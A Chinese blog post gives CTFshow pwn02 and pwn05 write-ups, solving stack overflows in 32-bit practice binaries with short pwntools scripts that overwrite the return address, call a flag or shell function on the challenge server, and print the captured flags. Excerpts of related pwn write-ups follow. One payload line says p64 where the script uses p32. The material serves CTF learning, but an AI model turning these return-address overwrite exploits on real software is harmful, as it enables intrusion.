CTFshow-pwn刷题

原创 已于 2025-01-01 19:09:08 修改 · 493 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #大数据 #运维 #web安全 #网络 #linux #c语言

于 2025-01-01 19:08:30 首次发布

pwn02

32位的

双击pwnme这个函数

fgets函数,栈溢出

s的地址是-9,目标r的地址是4

这里有一个stack函数

地址是0x804850F

payload:

payload = b'a'*(0x9+4) + p64(0x0804850F)

exp

from pwn import*
p = remote('pwn.challenge.ctf.show',28185)
payload = b'a'*(0x9+4) + p32(0x0804850F)
p.sendline(payload)
p.sendline('cat flag')
p.interactive()

ctfshow{95cc7be7-bc2d-412b-9633-7131b3b507c3}

pwn05

32位的

F5main函数之后

双击welcome

双击s

s的地址是-14,目标地址r是4

getFlag的地址是:

0x8048486

构造payload

payload=b"a"*(0x14+4)+p32(0x08048486)

exp

from pwn import*
p = remote('pwn.challenge.ctf.show',28169)
payload=b"a"*(0x12+6)+p32(0x08048486)
p.sendline(payload)
p.sendline('cat flag')
p.interactive()

ctfshow{33456f1e-e589-4481-8e0c-465b3317b85d}

ctfshow笔记(pwn篇)
Gygert的博客
03-16 4066
一入pwn坑深似海,从此web是路人 目录pwn02pwn03 pwn02 常规checksec一下 扔进IDA 点进pwnme()函数看看,明显的栈溢出 搜索字符串有/bin/sh 直接淦它 from pwn import* io=remote('111.231.70.44',28054) #io=process('./pwn02') bin_sh=0x0804850F payload=b'a'*13+p32(bin_sh) io.sendline(payload) io.interactive(
ctfshow笔记—栈溢出pwn53~pwn56
Yilanchia的博客
02-19 777
它先循环读取,每次一个字节,直到读取到换行符(ascll:10 0xa),循环读取才会结束,__isoc99_sscanf(v2,”%d”,&nbytes)这个函数从v2中读取一个整数,存放到nbytes变量中,这个变量决定了我们能够向buf写入的数据大小,我们想要造成溢出,这个数据就需要大一点,接下来,就去比较s1与global_canary是否相同,相同这个函数才能正常返回,造成溢出。,应该需要找到flag之间的关系。主要是提示用户输入数据,输出欢迎信息并让用户输入密码,进行比较,以便执行flag。
ctf.show--pwn入门做记录(一)
2401_87685579的博客
11-16 416
ctfshow的个人做思路
ctfshow pwn记录
qq_73089613的博客
04-18 770
正式开始栈溢出了,先来一个最最最最简单的吧首先使用checksec查保护:32位程序,开启了堆栈不可执行保护。首先运行一下:发现他会打开根目录下的文件,但是并不对其进行输出。这里使用ida进行反编译:发现,程序读取文件后存入flag变量中,但不打印,然后打印字符串,进入验证argv[1]的值,但是程序中并没有给定输入argv数组的功能,然后根据argv[1]的值输出不同的字符,其中,当argc >= 1时,会进入ctfshow函数中,进入观察:发现使用strcpy。
ctfshow-萌新赛笔记
wyjcxyyy的博客
03-15 918
启动靶机,发现是sql注入,尝试后发现'被转义\,思路到这里就断了,再看目给她,想到git.有可能是.git文件泄露,dirsearch扫描一下果然是,用GitHack看一下git备份文件,得到hint.php。这里用到了sprintf函数,addslasheshes函数addslashes 是 PHP 中的一个内置函数,用于对字符串中的特殊字符进行转义,通常用于防止这些字符破坏 SQL 查询语句的结构。
BUUCTF-PWN记录25(IO file attack)
weixin_44145820的博客
08-14 1741
背景知识 在做关于IO FILE的攻击的时候,对其中涉及的数据结构的了解必不可少,以下是几个关键的数据结构 FILE 结构 定义在 libio.h 中,如下 struct _IO_FILE { int _flags; /* High-order word is _IO_MAGIC; rest is flags. */ #define _IO_file_flags _flags /* The following pointers correspond to the C++ strea
Pwn记录(不停更新)
qq_66013948的博客
06-23 467
​ 发现了个事儿,for循环会执行两次,所以这里采用第一次不溢出,通过格式化字符串漏洞对Canary的值进行泄露,之后就可以在合适的地方填入canary的值来绕过canary保护了。​ 之后就是具体进行溢出了,计算溢出的长度也比较简单,这里直接上答案吧,116字节,不过,第100到104为canary的值。​ 根据这俩进行计算,可得到偏移,结果是0x7c/4=31。​ 除了NX之外,似乎就只有 Canary了。​ 因此,思路就很明确了。
BUUCTF PWN 1-15
农夫果园好好喝的博客
08-21 2422
经典栈溢出漏洞。
ctfshow pwn入门20
03-19
好的,我现在需要帮助用户找到CTFShow平台上关于PWN入门的解和教程。首先,用户提到了他们之前做过pwn02和pwn03,参考了相关的引用内容。我得先回忆一下CTFShowPWN目的结构,通常入门会从基础栈溢出开始,...
NSSCTF笔记pwn9——[GFCTF 2021]where_is_shell
qq_45692883的博客
02-02 874
然后首先要注意这是64位的程序,参数会依次存放在rdi,rsi,rdx,rcx,r8,r9这6个寄存器中,多的存放在栈中。$0也是可以被当做shell执行的,因此我们去掉前面一位,取出shell的地址是0x400541。然后我们还需要一个ret的地址,否则本地能打通,远程打不通。存在一个提示函数,代码报红,说明存在问,看一下机械码。有system函数,但是不存在/bin/sh字符串。可以看到\x24 \x30对应的是$0。main函数,存在很明显的栈溢出。找到地址 0x4005e3。
ctfshow 内部赛签到
08-28
- *2* *3* [ctfshow 内部赛 pwn 签到](https://blog.youkuaiyun.com/SCP000111/article/details/121353677)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
如何从Kubernetes集群中安全移除节点
xcbeyond|疯狂源自梦想,技术成就辉煌
07-23 917
从 API Server 中移除节点对象,kube-controller-manager 停止监控该节点。通过遵循本指南,您将能够高效安全地管理Kubernetes节点生命周期,确保集群稳定运行。在 Kubernetes 集群的生命周期中,节点维护是不可避免的操作。本指南将详细介绍安全移除节点的全流程,确保操作平滑无感知。的标准流程,配合完善的预检和验证,可确保服务零中断。,阻止新Pod调度到该节点,但现有Pod继续运行。
4G车载录像机的作用详解:提升行车安全与智能管理的核心技术
索迪迈科技
07-22 648
随着物流运输、公共交通、特种车辆等行业对安全与管理需求的提升,4G车载录像机已成为现代车辆智能化管理的重要组成部分。它不仅具备传统行车记录仪的录像功能,还结合4G无线通信、AI智能分析、GPS定位、云存储等技术,实现远程监控、实时调度、驾驶员行为管理等功能。本文将详细解析4G车载录像机的作用,涵盖其在安全管理、车队运营、事故处理、数据管理等方面的核心价值。
飞行控制领军者 | 边界智控携高安全级飞控系统亮相2025深圳eVTOL展
最新发布
Spey_Events的博客
07-25 518
目前,边界智控在团队、产品、技术、业务及融资等各方面均实现了业内领先。2025 深圳eVTOL展的举办,为全球eVTOL产业链搭建了高规格、国际化的交流合作平台,全面多维地彰显了参展企业的卓越实力与行业引领地位,更为推动 eVTOL产业向高质量、规范化、规模化方向发展提供了有力支撑,对引领低空经济未来发展具有重要意义。作为eVTOL飞行控制领域的核心赋能者,边界科技将借此国际平台,全面展示其在核心技术领域的最新突破,与全球业界同仁深入交流前沿理念,共同探讨飞控系统对于推动eVTOL产业发展的核心驱动作用。
输电线路微气象在线监测装置:保障电网安全的科技屏障
WHFENGHE的博客
07-24 317
输电线路微气象在线监测装置通过集成高精度传感器和智能分析技术,实时监测线路环境参数(覆冰厚度、风速风向、温湿度等),具备IP67防护等级和-40℃至85℃工作范围。该装置采用太阳能+锂电池供电,支持4G/5G/北斗多模通信,能提前4-6小时预警覆冰等灾害,降低60%运维成本,适用于高海拔、沿海等复杂环境。未来将结合AI和无人机技术,实现更智能的电网安全管理。
如何判断钱包的合约签名是否安全
duoyasong5907的博客
07-24 128
假如有以下交互,可以看到钱包试图调用地址0xBe535合约的方法Security Update。
水库大坝安全自动监测系统:守护水脉长城的智能防线
2501_92658014的博客
07-23 835
水库大坝安全自动监测系统:守护 “水脉长城” 的智能防线 柏峰【BF-GNSS】水库大坝作为防洪抗旱、水资源调配的关键工程,其安全运行直接关系到下游千万群众的生命财产安全和社会经济稳定。传统的人工巡检不仅效率低下
等保2.0详解:筑牢数字时代安全基石
qq_39980997的博客
07-22 674
在数字化转型加速演进的今天,网络安全已成为国家安全的核心命脉。等保2.0作为我国网络安全体系的重大战略升级,以《网络安全法》为基石,突破传统防护边界,构建"一个中心三重防护"的创新架构。
【Elasticsearch】安全地删除快照仓库、快照
Code · Cloud · Think · Repeat
07-22 679
本文详细解析了 Elasticsearch 中删除快照仓库和快照的安全机制。删除仓库操作仅移除集群内的注册信息,不会删除底层存储中的实际快照数据。要彻底清理物理数据,需在删除仓库前通过 API 删除快照,或直接操作存储系统。删除单个快照时,系统会智能清理仅被该快照引用的段文件,保留被其他快照共享的数据。这种基于引用计数的增量快照机制确保了删除操作的安全性,不会影响其他快照的完整性。文章通过乐高积木的比喻形象说明了快照间的数据共享关系。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小丑001.

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值